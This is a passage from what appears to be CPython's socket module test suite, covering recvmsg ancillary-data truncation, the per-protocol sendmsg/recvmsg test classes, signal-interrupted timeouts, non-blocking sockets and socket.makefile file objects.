self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
